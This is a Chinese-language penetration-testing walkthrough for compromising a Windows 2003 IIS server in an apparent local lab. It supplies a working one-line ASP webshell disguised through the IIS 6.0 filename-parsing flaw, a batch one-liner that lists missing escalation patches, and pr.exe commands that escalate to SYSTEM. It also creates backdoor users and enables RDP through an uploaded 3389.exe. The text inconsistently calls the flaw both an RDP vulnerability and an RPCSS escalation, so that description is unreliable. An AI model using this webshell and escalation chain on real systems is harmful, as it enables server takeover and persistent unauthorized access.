實驗操作均在本地靶機內(nèi)操作，據(jù)網(wǎng)絡(luò)安全法，作者不對因閱讀、理解、誤用或濫用本文內(nèi)容而導(dǎo)致的任何直接、間接、附帶或后果性損害承擔(dān)責(zé)任。

1、漏洞前提

巴西烤肉漏洞”（也被稱為“巴西烤肉攻擊”或“遠(yuǎn)程桌面協(xié)議（RDP）漏洞”）主要指的是針對微軟遠(yuǎn)程桌面協(xié)議（RDP）的一種安全漏洞。

漏洞利用的條件是：

1. 拿到了shell（這里我們假設(shè)已經(jīng)通過web漏洞拿到了）
2. 目標(biāo)開啟RDP服務(wù)（我們可以通過拿到shell后的命令行開啟）

2、前期準(zhǔn)備

靶機：Windows-2003，IIS中間件

2.1 木馬連接

用普通的一句話木馬，放置到網(wǎng)站目錄中：

<%eval request("test")%>

命名木馬為test.asp;.jpg（IIS 6.0 存在的文件名解析漏洞），使用中國菜刀連接：

右鍵進(jìn)入終端，嘗試命令whoami，dir，發(fā)現(xiàn)無權(quán)限，拒絕訪問：

原因在于：菜刀調(diào)用的是目標(biāo)服務(wù)器系統(tǒng)的 cmd.exe，此 cmd.exe 程序沒有iuser權(quán)限(從網(wǎng)站進(jìn)去服務(wù)器時，當(dāng)前身份是來賓用戶并沒有權(quán)限去調(diào)用系統(tǒng)的CMD.exe)

2.2 可讀寫目錄測試

目前我們是有拿到webshell的，那么說明該站點根目錄是具有可讀寫的權(quán)限，此時我們可以通過菜刀上傳一個腳本去檢測網(wǎng)站目錄的權(quán)限（使用腳本 666.asp 檢測目錄權(quán)限）

先找到網(wǎng)站下面具有讀寫權(quán)限的目錄，上傳 666.asp：

然后通過瀏覽器訪問：

http://192.168.49.141/asp/666.asp

藍(lán)色可讀寫，紅色不可以

2.3 上傳對應(yīng)版本cmd.exe

根據(jù)對方的操作系統(tǒng)版本，找到對應(yīng)的操作系統(tǒng)版本中的cmd.exe的程序。（注意上傳的cmd.exe程序的版本和型號：如果對方是Windows2003操作系統(tǒng)，那么我們可以在本地虛擬機搭建Windows2003的機器，下載里面的 cmd.exe 程序，通過菜刀上傳到對方服務(wù)器站點）

在命令行界面我們可以使用setp去調(diào)用我們上傳的 cmd.exe 程序：

setp c:\wmpub\cmd.exe

我們自己上傳的 cmd.exe 程序，是通過網(wǎng)站上傳的，他具備iuser（來賓用戶）權(quán)限，所以我們可以直接通過它以來賓用戶的身份來調(diào)用操作系統(tǒng)的命令。

2.4 查看補丁

使用systeminfo命令查看服務(wù)器打了哪些補丁，如果遇到systeminfo命令不可使用時，大概率是因為對方操作系統(tǒng)的systeminfo.exe程序權(quán)限不夠或者損壞，此時我們可以再次通過菜刀上傳systeminfo.exe，通過絕對路徑調(diào)用去執(zhí)行。

可以使用systeminfo執(zhí)行檢測未打補丁的命令來進(jìn)行補丁檢測：

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

根據(jù)這些補丁編號，去公開的網(wǎng)站搜索EXP（百度，CSDN，github等），復(fù)現(xiàn)提權(quán)。

3、巴西烤肉漏洞利用

也稱為Microsoft Windows RPCSS服務(wù)隔離本地權(quán)限提升漏洞。

3.1 菜刀上傳pr.exe

3.2 pr.exe提權(quán)

切換至pr.exe的目錄，使用命令：

pr.exe "whoami"

system權(quán)限

然后就可以使用system權(quán)限創(chuàng)建后門用戶或者進(jìn)行其他操作了

3.3 開啟3389遠(yuǎn)程連接

被控制機器沒有開啟遠(yuǎn)程連接的話，我們有后門用戶也無法RDP登錄，這里我們可以菜刀上傳 3389.exe ，然后通過 pr.exe 去調(diào)用，即可一鍵開啟3389遠(yuǎn)程連接：

pr.exe "3389.exe"

之后就能使用后門用戶進(jìn)行RDP登錄了。